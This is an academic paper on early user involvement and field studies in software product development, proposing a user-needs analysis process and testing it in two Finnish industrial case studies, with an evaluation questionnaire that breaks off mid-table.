The discussion so far demonstrates that user involvement is not simple information-gathering, but that developers and users have different vocabularies, interests, and values, which makes the communication and interplay complicated. On the other hand, user involvement can be seen as a potential input for designing systems that support human values. By human value, we mean anything that has personal or social worth or meaning. The values may be learned in childhood or adapted as the person takes part in a social group. Value-sensitive design has received growing attention (Friedman, 1996), but the discussion has been on a rather general level, concerning basic human values such as user autonomy, and more could be done to understand how relevant values for a particular project can be discovered (Flanagan et al., 2005).
The focus of this study is on user involvement, particularly in product-development contexts. The goal of this study is to investigate how early user involvement could be effective in product development where the large number of users makes their participation impossible. User involvement is most efficient and influential in the early stages of system development and field studies appear to be a promising approach to early user involvement. However, field studies are often found time consuming, and the analysis of user needs is particularly challenging.
First, the forms of user involvement and the motives as to why users should be involved are discussed. Second, user involvement and its practical realisation in product development context are described. Furthermore, on the basis of the experience gained in seven case studies, specific steps of early user involvement are presented to support the analysis and utilisation of user needs in product development. Finally, the process is evaluated in two industrial cases and the results are discussed.
2. Variety of user involvement
User involvement can be seen as a general term describing direct contact with users and covering many approaches, such as user-centred design, participatory design, ethnography, and contextual design (Kujala, 2003). Furthermore, user involvement is not a one-dimensional concept, but we need to consider the varied forms and motives of involvement in order to apply it to product development.
2.1 Forms of user involvement
The form of user involvement can be broadly characterised as being somewhere on the continuum from informative, through consultative, to participative, as illustrated in Figure 1, adapted from Damodaran (1996). Users may take active roles or they may be involved as providers of information, commentators, or objects for observations.

Figure 1. Forms of user involvement (Damodaran, 1996).
Participatory design is sometimes used interchangeably with user involvement, but it is located at the participatory end of Damodaran’s (1996) continuum. Participatory design originated in Scandinavia, where democratic participation and skill enhancement are important features of participatory design (Ehn, 1993). Thus, participatory design originally included the idea of users actively participating in design work. However, Kuhn and Muller (1993) state that outside Scandinavia, the field is more varied, with some theorists and practitioners pursuing a locally adapted form of democratic decision-making and others emphasising effective knowledge acquisition and product quality.
Thus, user involvement may have different forms; the essential distinction between these is how active users’ roles are, whether they influence decisions, or whether they even participate in development work. The triangles in Figure 1 illustrate the typical forms of user involvement in product development compared to in-house development. Participatory design is characteristic of in-house development, in which users are known and willing to participate in development work (Rauterberg et al., 1995). It can also been the recommended form of user involvement, as users have possibility of influencing decisions relating to the system. As apparent from Olsson’s (2004) work, users and developers may have very different interests, values, and vocabularies. Thus, for user-centred design, user involvement may not have optimal results if the design has been conducted in terms of developers, as developers could ask questions from their point of view and interests and make their own interpretations and decisions. On the other hand, the typical form of user involvement is informative and consultative in product development, as the potential users are not usually interested in putting effort into the development of a commercial product. However, all forms of user involvement support the different motives of user involvement discussed in the next section.
2.2 Motives for user involvement
In addition to different forms, user involvement has varied motives. Muller et al. (1997) identify three convergent motives for participatory design: 1) democracy; 2) efficiency, expertise, and quality, and 3) commitment and buy-in. The first motivation, democracy, was an essential part of the original Scandinavian formulation of participatory design. Developing workplace democracy and the development of workers’ competence and power to influence their work and their workplaces were the driving forces of the work (Ehn 1993). Muller et al. (1997) suggest that the second type of motivation has emerged from North American practice and that direct participation by end-users is seen in this context as a means of enhancing the process of gathering (and perhaps interpreting) information for system design. The effectiveness of software design and development is improved by including the users’ expertise. Efficiency is improved by getting users to collaborate in design and by involving users early in the design process. The quality of the design and the resulting system is improved through better understanding of the users’ work and better combination of the diverse and necessary backgrounds brought by various participants. The third motivation, commitment and buy-in, means that a system is more likely to be accepted by ‘downstream’ end-users if those users are involved in certain ‘upstream’ formative activities.
Several others have identified similar kinds of motives or, in other words, benefits of user involvement (Kujala, 2003). For example, Damodaran (1996) lists the benefits that effective user involvement has shown to yield in a variety of studies: 1) improved quality of the system arising from more accurate user requirements; 2) avoidance of costly system features that the user did not want or cannot use; 3) improved levels of acceptance of the system; 4) greater understanding of the system by the user resulting in more effective use, and 5) increased participation in decision-making within the organisation.
In summary, the motives for user involvement can be categorised into three partly overlapping classes:
1. Democratic motives that support:
- workers’ participation in decision making and power to influence their work
- development of workers’ competence and expertise
2. Motives for user involvement
2. Organisational motives that support:
- acceptance of the system by end-users
- learning and using of the system
3. Practical development-oriented motives that support:
- understanding the users’ work
- defining more accurate user requirements
- improving the quality of the system
- improving development efficiency
- increasing user and customer satisfaction
Figure 2 demonstrates the proposed relations of the practical development-oriented benefits of early user involvement (adapted from Kujala, 2003). Early user involvement seems to have a positive value for users and customers as such (Kujala et al., 2001a, Kujala, 2003), but user and customer satisfaction can be considered as improving through better system quality. Requirements quality is an intermediated factor improving user and customer satisfaction in the long run. Requirement quality is better and development work is performed better as the requirements are based on real information gained from users. In addition, users are available for giving feedback and testing design solutions. Thus, the resulting system is more likely to match the needs of the users.
3. User involvement in product development contexts
Sawyer (2000) suggests that the major differences between packaged and custom software development can be characterised as stakeholding and schedule constraints. In custom software development, the customer is the principal stakeholder and often bears a large proportion of the risk. Packaged software development, by contrast, is undertaken directly in support of the developer’s strategic business objectives. Sawyer (2000) makes the further point that packaged software development typically exploits a market opportunity without a discrete set of users who can articulate their requirements. Thus, it needs to be carefully considered how user involvement is applied in practice in product development contexts.
3.1. Practical motives of user involvement
As Grudin (1991a) describes, in product development the users often remain unknown until the product is marketed. Keil and Carmel (1995) confirmed by their survey that in the package environment over 90% of the
projects relied on marketing and sales for customer input and requirements. In addition, their results show that more successful projects employed more direct links to users and customers than did less successful projects. In spite of Keil and Carmel’s (1995) positive results, it is sometimes argued that user involvement is not an appropriate approach in product development contexts. Furthermore, Grudin (1991b) and Poltrock and Grudin (1994) provide a detailed description of the organisational obstacles to direct contacts between developers and users in large product development organisations. Such obstacles include challenges in motivating the developers, identifying appropriate users, obtaining access to users, motivating the users, and in deriving benefits from user contacts when established. The findings of Grudin (1991b) rely on an earlier survey and on interviews with over 200 interface designers from several product development companies. Furthermore, Iivari (2004) analysed user involvement in two product development organizations. She identifies divergent views of the motivation for user involvement. Democratic goals were not mentioned, but user involvement is seen as helping the projects to ‘do a quality job’, ‘get it right the first time’, and as a selling argument and image factor for the company in making profits. Iivari (2004) argues that some of the images of user involvement identified might be interpreted as being in stark contrast with the original aims of the Scandinavian participatory tradition. However, it can be argued that the characteristics of the product development context make the democratic and organisational motives of user involvement described in Chapter 2.2 somewhat inappropriate. For example, Karlsson et al. (2002) argue that requirements are invented by the developers, since there is not a discrete set of users who can articulate their requirements. A large number of users makes it hard to involve users in a democratic way and thus users cannot be committed through participation either. In addition, users may not be motivated to participate in the development work of a commercial product. Users have a large number of products to select from, and on the other hand, the product may be used in many organisations, which are not known before the product is ready. Nevertheless, all the practical development-oriented motives of user involvement described in Chapter 2.2 are valid for product development. Even if users may not be motivated to participate in the development work, several cases show that, at least to some extent, there are interested in providing information and feedback (Kujala, 2002). Users want good quality products and better support for their tasks, and so appreciate their views being considered. They are experts in domain knowledge, their tasks and work practices, behaviour and preferences, and general context of use. By gathering this information, it is possible to define user requirements more accurately and, by doing so, create better system quality. Furthermore, better developmental performance is based on gathering correct information sufficiently early.
3.2. Understanding user needs
There are several usability methods that are suitable in the product-development context (e.g. ISO/TR 16982, 2002). However, user involvement is most efficient and influential in the early stages of system development, as the costs involved in making changes increase as the development continues (cf. Ehrlich and Rohn, 1994; Noyes et al., 1996). Thus, ISO 13407 (1999) emphasizes the importance of user involvement in understanding and specifying the context of use, which is the basis of specifying user and organizational requirements. The context of use is defined as the users, tasks, equipment, and the physical and social environments in which a product is used. In a similar vein, Gulliksen et al. (2003) describe in their principles for user-centred system design the importance of understanding the context of use in order to create and maintain a focus on user rather than technical needs. Thus, understanding user needs as they are interwoven with context of use is one of the principle goals of user involvement. Users do not need to conceptualise the context of use, but nevertheless this defines the limits and possibilities the users have in achieving their goals. Thus, we define user needs as problems that hinder users in achieving their goals in a specified context of use. Understanding
the context of use is not valuable as such, but we need to understand user needs or, in other words, we need to understand how the future product can support users in achieving their goals in a specified context of use.
4. Field studies as an approach to gathering user needs
As discussed above, understanding user needs is one of the main goals of user involvement. Field studies are an approach focusing on early user involvement and gathering information from users about their needs. Field studies mean that users and their tasks and environments are studied in their actual context using qualitative methods (cf. Wixon et al., 2002). As field studies are qualitative by nature, the number of participating users is typically not large, but the goal is to select representative users and understand in depth their needs and the typical context of use. Hackos and Redish (1998) describe an extensive range of field methods and provide practical advice on conducting field studies.
4.1 Benefits and challenges of field studies
A literature review of field studies reveals many positive experiences (Kujala, 2003). For example, it was felt that more accurate user requirements were gathered and user needs were better reported. In addition, positive customer and user responses were reported. On the other hand, many challenges to the improvement of field study techniques exist, in particular, how to analyse a large amount of data. The information gathered from users is descriptive and informal by nature and the analysis of it is time demanding. The problems were repeatedly reported in the book ‘Field Methods Casebook for Software Design’ edited by Wixon and Ramey (1996). Field studies are often seen to be time consuming, providing a vast amount of unstructured data that is difficult to use in development (e.g. Bly, 1997; Hynninen et al., 1999). Moreover, fieldworkers have been found to have problems with communicating results to system developers and with effecting design work (Plowman et al., 1995). Even though field studies are considered beneficial, they are not widely used in practice. For example, the results of a recent survey of user-centred practitioners show that the practitioners themselves consider field studies and user-requirement analysis most important, although not as widely used as other approaches (Wredenburg et al., 2002). The main reason is probably the above-mentioned challenges in analysing user needs. These challenges need to be addressed to make field studies sufficiently practical.
4.2 Analysing user needs and discovering relevant issues
The power of field studies is in deeply understanding context of use. However, it is not a trivial task, and context includes a huge amount of details, but only some of them are relevant for development. For example, Greenberg (2001) provides a summary based on several theories and stating that context is a dynamic construct, changing moment by moment, and people interpret it to perform actions.
In addition to the complexity of the context of use, interpreting and analysing context of use for development purposes is challenging. As Olsson (2004) argues, people are often preoccupied with the current work situation and its inherent routines, but are not so concerned with delivering upfront the appropriate design demands. Thus, because users do not have professional skills to define user requirements, the task of analysing user needs and translating them to user requirements is left to developers. For example, Beyer and Holtzblatt (1998) state that design begins with a creative leap from customer data to the implications for design and from implications to ideas for specific features. In addition, they describe using customer data as a new skill. They recommend recognising the overall work situation and envisioning an integrated solution.
As a solution, Contextual Design provides five work models to represent customer work practice (Beyer and Holtzblatt, 1998). The flow model represents the communication and coordination necessary to do the work. The sequence model shows the detailed work steps necessary to achieve an intention. The artefact model
shows the physical objects created to support the work, along with their structure, usage, and intent, culture, or values. The physical model shows the physical structure of the work environment as it affects the work. These models are then consolidated into models characterising the work structure and basic work strategies across all customers.
The idea of producing and consolidating the contextual work models is to gain an understanding of the context of use or the underlying structure of the work. However, the tasks are complicated and time-demanding in product development contexts. On the other hand, the cleverness of Contextual Design is that designing the user interface and its details are delayed as long as possible and it encourages thorough design change that goes beyond user interface changes (Spinuzzi, 2000). As Holzblatt and Beyer (1993) describe it by themselves: ‘We could use prototypes, mockups, or sketches to represent system structure. But we find they focus the team on the user interface. They hide the structure of the system behind user interface details, making it easier to talk about menus, icons, work choice, and screen layout than about whether the structure and organisation are right.’
In Contextual Design, the goal is to redesign the underlying structure of work rather than the artefact. In fact, this is reminiscent of the focus of the task analysis approach. For example, Kirwan and Ainsworth (1993) state that task analysis is the name given to any process that identifies and examines the tasks that must be performed by users when they interact with systems. Jeffries (1997) states that the analyst’s goal is to understand the tasks well enough to enumerate their steps and choice points, and to constrain the set of task variations to something that is cognitively manageable but also covers the critical functions that the software will support. Jeffries (1997) does not describe such a conscious goal of redesigning tasks, but the typical result of a task analysis is a list of all the tasks people do in this domain. In addition, he gives a list of ways in which task analysis can be useful in a software project, such as identifying the task to be performed by the system and redundant work that can be minimised.
As Diaper (2001) points out, an outstanding methodological issue for task analysis in general is how to analyse information derived using requirements capture techniques. Furthermore, the task analysis processes described are too difficult to use within tight time scales in product development contexts. For example, Diaper argues that as a method, TADK (Task analysis for knowledge descriptions) is too complicated to use with task analyses of any size without software support.
In summary, it is generally agreed that the goal of user involvement is to understand the context of use and user needs. Better user requirements and user interface can then be defined on the basis of that information. Field studies appear a promising approach to understanding user needs. However, analysing and structuring user needs in product development contexts has been shown to be difficult.
5. Research method
Early user involvement was investigated in real product-development contexts by means of case studies in order to understand the conditions of user involvement in natural product-development settings. This study adopts multiple-case research design strategy (Dubé and Paré, 2003; Yin, 1994). Multiple case studies were performed to understand the influence of variability in context and to gain more general research results than single cases (Yin, 1994). First, the cross-case analysis of the first seven case studies was used to develop a process of early user involvement to support the analysis and utilisation of user needs in product development. Second, two case studies were performed to test the developed early user-involvement process. All the nine case studies were performed as a part of three research projects carried out between 1998 and 2005. The studies were based on real product-development cases in six industrial partners in Finland. The cases represent diverse applications and companies, which enhances the generalizability of the results (Eisenhardt, 1989).
The first seven studies were individual case studies in which within-case analysis was used (cf. Eisenhardt, 1989). Most of the case studies were published and the results are summarised in Kujala (2002). The goal was to evaluate the costs and benefits of the field study approach. As shown in Table 1, several data-gathering methods were used in order to increase the internal validity of the results (Dubé and Paré, 2003). It was found that the field study approach is useful even in a short time frame and incurs relatively low costs. For example, usability was improved and customer satisfaction was increased. The number of involved users varied from three to thirteen. As mentioned earlier, field studies are qualitative in nature and the goal is to understand the needs of the users in depth, rather than to cover large sample of users. The rationale of selecting representative users is described in Kujala and Kauppinen (2004). As Eisenhardt (1989) points out, the within-case analysis gives investigators a rich familiarity with each case, which, in turn, accelerates cross-case comparison. Here, the cross-case analysis was used to identify a process of early user involvement in order to support the analysis and utilization of user needs in product development. The goal of the last two case studies was to test the analysis process in real product-development contexts. The results were analysed in two stages (Eisenhardt, 1989). Within-case analysis was performed first to provide researchers with a rich understanding of each case. Second, a cross-case analysis was performed to identify the similarities and differences between the cases.
6. Cases: Process of analysing user needs
The first seven case studies are summarised in Table 1. The research questions varied as the research work went on and new problems and solutions identified. Table 1 summarizes the lessons learned concerning the analysis and utilization of user needs. In the first two case studies, reported by Kujala and Määttä (2000ab), the goal was to describe the results of field studies rather than analyse them. The work models of Holtzblatt and Beyer (1993) were taken as the starting-point for describing the current situation. However, it was recognised that the work models were too complicated to use cost-effectively and thus only a simple picture of the current context of use was produced. After that, the design work quickly turned to describing the use hierarchies of the future product as task sequence was identified as important in defining the new product. In addition, the problems of users were found to be very useful in identifying new product features.
Table 1. Summary of case studies.
In the last five case studies, three of them reported in Kujala et al. (2001b), the field studies were introduced and performed in real product-development contexts and by real developers. It became evident that a clearer and more cost-effective process for analysing the results was needed. In the case study reported by Kujala et al. (2001a), the person hours used in performing the field study was carefully calculated and it was found that analysing and reporting was the most time-consuming phase: 23 % of the time was spent in gathering data and 77 % in analysing and reporting. In addition, the team members found this a particularly demanding phase. In the following studies, user-needs tables were developed to bridge the gap between informal user needs and more formal requirements. In addition, we started to work on the process of analysis and making this explicit enough to enable it to be taught and used effectively.
Based on these case studies, we identified main six steps of early user involvement for identifying user needs and analysing them:
1. Identify stakeholders and user groups
First, the most important stakeholders and user groups need to be identified and described so as to make it possible to reach representative customers and users by means of field studies. We have discussed the identification of users in Kujala and Kauppinen (2004).
2. Visit users and explore their needs
Users are visited in their own environment in order to gather real information about their needs.
3. Describe the current situation
The first step in analysing the results of the field study is to describe the current situation. By the current situation, we mean the context of use and particularly the task sequence. In our case studies, we used a simple figure, a task hierarchy, a scenario, and user-needs tables to describe the current situation.
4. Analyse and prioritise the problems and possibilities
In order to utilise the information gathered in product development, the user needs associated with the future product are identified. In case studies, it appeared clear that understanding the problems of the users was key to developing new products for them and that, when the problems were analysed, it was easy to develop new products to correct those problems and support users in their tasks. Thus, we argue that user needs manifest themselves as either problems that hinder users in achieving their goals, or as opportunities to improve the likelihood of users achieving their goals. Not all the problems and possibilities are clearly stated by users, but the positive and negative aspects of the context of use and the present tasks and tools need to be analysed and identified. The negative aspects may be labour-intensive or complicated task steps or sequences, task details difficult to remember or complete, or task steps performed using traditional methods such as paper and pencil. The positive aspects are those which users value and are not willing to change. Finally, there may be too many user needs for one product to be able to meet and thus the identified user needs need to be categorised and prioritised.
In categorising needs, we have used a similar process to that which Bruseberg and McDonagh-Philp (2001) used for initial data analysis of the aspirations that users stated in focus groups. Bruseberg and McDonagh found that making notes of essential issues and comments made by users can be more effective than producing lengthy verbatim notes. They classified similar repeatedly-mentioned topics into categories and substantiated the weight of the categories by giving them a ‘tick’ each time a related thought was mentioned. In our case studies, we have similar experiences; developers are not willing to use or capable of utilising verbatim descriptions and we developed user-needs tables to summarise and structure the findings.
Although we identified the problems of the users as essential links to product development, it was not always so easy to utilize the information in development work. There were often an overwhelming number of problems, and technically oriented developers had a problem in processing the written descriptions. We realised that developers need a slightly more formal way of representing user needs so that they could process the information step by step. Thus, we combined the two most essential representations of context of use - a task sequence and user problems and possibilities – in user-needs tables. In other words, user-needs tables represent user needs as users’ problems and possibilities, and link them to a task sequence. Several kinds of user information can be summarised in the form of user problems and possibilities. Problems are obstacles that arise from users’ characteristics, their physical and social environment, and the overall situation. Possibilities represent users’ more implicit needs, and suggest how users’ tasks can be supported and improved. However, the information is in a structured form and can be used step by step in redesigning the current situation.
5. Redesign the current situation
The first step in utilising user needs and defining user requirements is redesigning the current situation and deciding the role of the product in the context of use. The values of users need to be identified so that it is possible to decide how to add value for them in the future product. It is essential to identify the focus of the product and the scope of the tasks to be supported. Furthermore, the identified problems should be corrected and users’ task sequences need to be streamlined. For example, unnecessary steps are eliminated. However, it is important to keep the existing logic as it supports users in performing their tasks. We have used use cases for describing the redesigned current situation, but use scenarios, storyboards, use workflows, or use flow diagrams could also be used (Hackos and Redish, 1998).
6. Define user requirements
In addition to redesigning the current situation, specific user requirements were also needed.
7. Cases: Testing the analysis process
The goal of the case studies was to test the analysis process in real product development contexts. The cases and the results of the within-case analysis are described first and then the comparison of the cases is presented.
7.1 Case 1
The first study was performed in Tekla, a medium-sized company producing software products for managing infrastructures. The main product, Tekla Structures, is a complex system for experts in structural engineering and it includes an expansive number of functions. The complexity of Tekla Structures is demonstrated by the fact that there are 220 commands on the first menu level, and, in addition, there are dozens of commands on successive menu levels.
The goal of the case study was to gather user needs for the redevelopment of a functionality of Tekla Structures. The product had been developed over the years according to customer feedback. Most of the corrections were rather small fixes. Now, a larger piece of functionality was identified as being difficult for the customers, according to the feedback received by area offices abroad. This functionality was selected for improvement, but the needs of the users were not well enough known and more information was needed from them.
Field studies
The field study was performed by a team of two usability experts, a user interface designer, and a researcher. The researcher’s role was that of an expert or a consultant who provided information, brief training, and support for the practitioners. In addition, a requirements engineering team of a requirements engineer, a usability expert, and a researcher participated in planning the field study and analysing the results.
In the beginning, existing information was gathered inside the company, for example from service. This information helped to focus the user interviews and was also of use in the selection of questions. Then, four users representing three customers were interviewed in order to ascertain user needs for the product and to gather feedback on the previous version of the product. One person conducted the interviews and another took notes. In addition, the interviews were audio recorded.
**Analysing the results of the field studies**
All three customers had developed their own strategy for handling the task and the problems associated with the task. This strategy was rather similar in all of them, even though the product did not introduce or support it. A number of user problems associated with the current task sequence were identified. It was realised that many of these problems will disappear when the functionality and user interface are changed. However, it was important to identify the essential task steps, phases, and problems for basing design work on user needs. Thus, we decided to have a higher-level view of the current task sequences and problems and it was described in a user-needs table (see Table 2).
<table>
<thead>
<tr>
<th>Step</th>
<th>Problems</th>
<th>Possible solution</th>
</tr>
</thead>
<tbody>
<tr>
<td>1. User creates a seed project (a project containing default environment and company settings).</td>
<td>Currently the seed project is a complicated many-level folder structure containing a complete set of Tekla Structures files, only the model excluded.</td>
<td>File/New opens dialog asking whether user wants to create 1) new seed project, 2) new model with seed project as template….</td>
</tr>
<tr>
<td>2. User saves a seed project.</td>
<td></td>
<td>Name/path asked, automatic save</td>
</tr>
</tbody>
</table>
Table 2. Example of the kind of user-needs table developed.
In addition to original use sequence (Step column) and problems and possibilities (Problems column), the requirements engineer added a possible solution column to describe initial solution ideas. This column was useful for getting an idea of how the problems could be solved in the new version of the product. After that the high-level task sequence described in the user-needs table was redesigned and the new task sequence was described in a use case (see Table 3). The requirement engineer used that table as a starting point and continued to define user requirements. The requirements engineering group also used user-needs tables for gathering feedback both from inside the company and users. The final requirements specification described the user problems and requirements on different levels: the current context of use, problems in the current user interface, requirements gathered inside the house by means of an a requirements management tool, users’ comments, use cases, a navigation map, and pictures of the new user interface.
<table>
<thead>
<tr>
<th>Step</th>
<th>User input</th>
<th>Program action</th>
<th>Note/ question</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>User indicates that he wants to save the model as a model template.</td>
<td>Tekla Structures asks the user to enter a name and location for the new model template.</td>
<td>Note: File->Save as…</td>
</tr>
<tr>
<td>2.</td>
<td>User enters name and location.</td>
<td>Tekla Structures saves the model as a model template to this location.</td>
<td></td>
</tr>
</tbody>
</table>
Table 3. Example of use case developed.
_Evaluating the analysis process_
The analysis process was evaluated by interviews and a questionnaire. The requirements engineer and two developers were interviewed and seven persons filled in the questionnaire. The persons who were working for the project were asked to fill in the questionnaire and three of them were also interviewed. They represented software production, usability group, user documentation, service, product management, and release management. Seven persons filled in the questionnaire, two from software production, two from the usability group, one from user documentation, one from product management, and one requirements engineer who was responsible for writing the specification. The questionnaire used is in Appendix A. First, the respondents were asked to evaluate the requirements quality in the developed specification and then they were asked to evaluate the usefulness of the descriptions used. Finally, they were asked to evaluate the general requirements quality in Tekla. The requirements team found the analysis process and the piloted descriptions useful; the descriptions supported analysing in stages and parsing a large amount of information. Different description methods complemented each other in step-by-step analysis and all the steps were important and had their own roles. In addition, documenting the essential issues helped in the structuring and analysis of the large amount of information gathered from users. Other respondents also found all the other descriptions useful, except the requirements gathered by the requirements management tool. The reason may be that the requirements were preliminary and inconsistent as
they were written by different people. However, the views expressed towards the descriptions seemed to depend on the role the respondent had. Particularly, technical developers were most interested in user interface pictures and a navigation map. They said that they would like to have all the background information available in another separate document. Another solution would be to have several views incorporated in the same document.
Furthermore, the quality of the requirements was evaluated as being better in the pilot project than in Tekla in general, as shown in Figure 3. One person refused to evaluate the general quality as she was a rather new employee of Tekla and thus her evaluation was excluded from Figure 3. In summary, one person out of the five evaluated the quality as being slightly lower in the project than in general and the other four evaluated the quality as being better in the pilot project.
Figure 3. Evaluated requirements quality in the pilot project and the company in general (Mean value of the quality statements, 1=strongly disagree, 4=strongly agree).
Figure 4 shows how the different requirements quality issues were evaluated and it is possible to see how the pilot project differs. The specification of the pilot project was seen as being more successful, complete, and understandable than specifications in general. In addition, the respondents evaluated the specifications as being based on information gained from users and customers.

**7.2 Case 2**
The second study was performed in F-Secure, a medium-sized company producing software security products. The goal of the study was being pilot field studies in one project, in which a new product was being developed for a new customer group. As the target customer group was new and relatively unknown, the idea was to validate the product idea, understand hidden user needs, and gather user requirements. Unlike the product in Case 1, the application was not used on a daily basis but it can be characterised as working in the background on a user’s computer.
Field studies
First, the user study team consisted of a project manager, a chief architect, and a researcher. The researcher’s role was that of an expert or a consultant who provided information, brief training, and support for the practitioners. The chief architect interviewed three users with the researcher. The results showed that the user needs depended on the customer type and their risk level. The business owner of the new product was now involved and she decided that more information was needed from users. This time, the user study team consisted of the business owner, a user interface designer, documenting team manager, and a researcher. The team interviewed 14 more users during a period of one month.
Analysing the results of field studies
The time schedule was very tight; there was no time for further analysis of the results of the first three interviews and only short notes were produced. After the rest of the interviews, the results were gathered onto 18 slides. In addition, the researcher produced a user-needs table describing the results. In this case, the description of the two main customer groups and the values of the users were identified as being the most essential results. It was found that the customers consisted of two distinctive groups that had different motives and needs for the product.
Evaluating the analysis process
In this case, the analysis process was much more inaccurate. Short notes were written for each interview and short textual descriptions of the current context of use were pulled together from the individual notes. As the product was intended to work mostly in the background on the computer and it reminded one of a service rather than a software product, redesigning the task sequence was not as essential as in Case 1. Thus, the analysis focused on describing the present context of use for evaluating the new product concept. However, as users’ skill level was notably lower than expected and they valued different things than expected, the business owner evaluated field study results as having a significant effect on the scope of the product.
7.3 Comparison of Case 1 and Case 2
The results of the Case 1 and Case 2 are summarised in Table 4. The two cases were representing diverse categories of applications and the results were accordingly different. Case 1 was in line with our earlier case studies, showing the validity of earlier findings and the developed process of early user involvement. It showed that the process helped in structuring and analysing the large amount of information that led from user needs to requirements. As a result, the requirements were evaluated as being more successful and their quality was better than average. In Case 2, the results of the field study was found useful, but the user-need analysis part of the process was not used. The main reason for not using the process was that the application did not engage so many user tasks to be described and redesigned. In this case, the benefit of field studies was derived more from understanding user motivation and values and enabled the correct product concept to be defined from the user-point of view.
These two cases demonstrate how different applications and their development can be. No single user-involvement process fits every case. Case 1 showed the proposed process of early user involvement to be useful. Case 2 revealed that the prerequisite is that the application supports users’ tasks that can be identified. Furthermore, Case 2 showed that informed redesign of user tasks is only one aspect of the benefits of the field studies and understanding user motivation is an essential benefit, too.
### 8. Conclusions
In this article, we have discussed the role of user involvement in product development. Our suggestion is that the most natural and promising form of user involvement in product development is informative and empowered. This means that even if products are developed for a wide audience of users (cf. Tuunanen, 2003) and they may not be motivated to play an active role in product development, it is essential for product developers to be active in gathering information and feedback directly from representative users and understanding their needs and values. Users should not be passive informants as, in spite of the good intentions of the developers, they have different values concerning products and their use.
The most significant user involvement occurs at the beginning of product development, when it is being decided what the product will be like and how it is going to support users. It is essential that product development is grounded on user needs interwoven with context of use. Field studies appear a promising approach to early user involvement, but they are found demanding and not widely used in practice. One of the critical concerns in making field studies effective is how to analyse user needs and discover relevant issues from product-development point of view. This article presents a process of early user involvement that describes how user needs can be analysed and utilised in product development. The process was developed on the basis of the experience gained from seven case studies.
Table 4. Summary of the results of Case 1 and Case 2.
<table>
<thead>
<tr>
<th>Case</th>
<th>Research question</th>
<th>Application</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td>I</td>
<td>How can field study results be analysed and translated into user requirements?</td>
<td>Building modelling software package</td>
<td>The analysis process helped in structuring and analysing the large amount of information. The resulting requirements were evaluated as being more successful and their quality was better than average.</td>
</tr>
<tr>
<td>II</td>
<td>How can field study results be analysed and translated into user requirements?</td>
<td>Software security product</td>
<td>The analysis of user tasks was unnecessary as the phase of development was very early and the product is working in the background on a user’s computer. Thus, identifying the context of use and user values were evaluated to be more important than analysing task sequence.</td>
</tr>
</tbody>
</table>
On the other hand, the process was not used in Case 2. As can be expected, no single user-involvement process fits the development of varied applications in varied contexts. Case 2 demonstrates that the prerequisite of using the proposed process is that the application supports users’ tasks that can be identified. Furthermore, it shows that informed redesign of user task is only one aspect of the benefits of field studies; understanding user motivation can be even more essential. It can be argued that, if the product idea does not
involve user values and motivations, it is not acceptable at all and the redesigned task sequence is not useful either. On the other hand, understanding user values and motivations and task sequence are not exclusionary, but, rather, early user involvement supports both issues. For example, according to our experiences, the details of task sequence are often very meaningful to users and problems in task sequence can be annoying to them. Thus, the process of early user involvement needs to be adapted on the basis of the application type and development situation. Furthermore, the presented analysis process is initial and simplified. For example, including collaboration and multitasks would bring a new dimension to analysis that is not considered here (see Pinelle et al., 2003). However, the goal of the process presented is not to be broad and extensive but to cover the most essential analysis steps for tightly scheduled product development projects. Thus, the process of early user involvement needs to be simple enough to be practical in product development.
The results of the case studies suggest some explanations of the mechanisms of early user involvement in product development. First, users can provide information about the context of use that has an effect on the use of the future product. Second, providing information is not the only mechanism, but placing developers near users increases their understanding of the users’ values and attitudes. This interpretation is also supported by the earlier observations of Olsson (2004). In addition, Kujala and Mäntylä (2000a) interviewed developers who happen to be users themselves and found that the developers incorrectly expect ordinary users to have similar patterns of behaviours and values to themselves. However, understanding users’ needs and values is only the first step in user involvement, and user-centred development is iterative in nature. As soon as a new product is sketched, it creates new user needs and requirements as the task-artifact cycle predicts (Carroll and Rosson, 1992).
The importance of understanding context of use is already widely recognized and is recommended by ISO 13407 (1999) and Gulliksen et al. (2003). However, in order to make the utilization of the context of use information possible, the links to development work need to be elaborated. The results of the case studies suggest some ways of utilizing the context of use information. In particular, present task sequence, problems, and possibilities are shown to have direct consequences for user requirements and finally for product quality. In addition, the popularity of different forms of scenarios demonstrates that task sequences and the context of use related to it are widely recognized as useful in system development (see, for example, Carroll and Rosson, 1992; Alexander and Maiden, 2004; Redish and Wixon, 2003). Certainly, different ways of describing task sequences can be useful and valid in analysing user needs. The user-needs table is one of the possible means of presentation; its strength lies in its summary of the context of use in one table in a structured way. Task scenarios that are narrative descriptions of a user performing a task would include the same information, but they are not so straightforward to use in development work. In addition, as Carroll and Rosson (1992) point out, there is an infinity of possible use-scenarios. A user-needs table structures the information so that it can be handled step by step and so the problems and possibilities highlight clearly where the current situation could be improved by a new system.
Overall, this article introduces an initial step towards understanding early user involvement in product development and how to improve its effectiveness. The article provides a process of identifying, analysing, and utilising user needs based on broad experiences from several industrial cases. Furthermore, it analyses a potential mechanism of user involvement.
Appendix A: The evaluation questionnaire
Tekla pilot project questionnaire 2005
This questionnaire is designed to gather experiences from the pilot project for Tekla product development purposes. Specification and requirements refer here to the pilot project start up “Specification of Feature” document. The questionnaire is a part of the CORE research project: http://www.soberit.hut.fi/core/english/index.html
All the information you provide will be kept confidential. The resulting report will present information in aggregate form and such information will be anonymous and unattributable to individual respondents.
The quality of the specification
Please indicate the strength of your agreement/disagreement with the following statements concerning the quality of pilot project specification.
1 = strongly disagree, 2 = disagree, 3 = agree, 4 = strongly agree, 5 = no opinion, don't know
<table>
<thead>
<tr>
<th>Statement</th>
<th>Disagree</th>
<th>Agree</th>
<th>Don't know</th>
</tr>
</thead>
<tbody>
<tr>
<td>I consider the specification a success.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Customer or user requirements are completely defined.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>All the essential issues from the customer and user point of view are documented.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The document describes functions that meet the user needs.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The customer and user processes that the system is designed to support are analyzed and documented.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are understandable for those who are not part of the project.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are described using language that a technical person understands.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
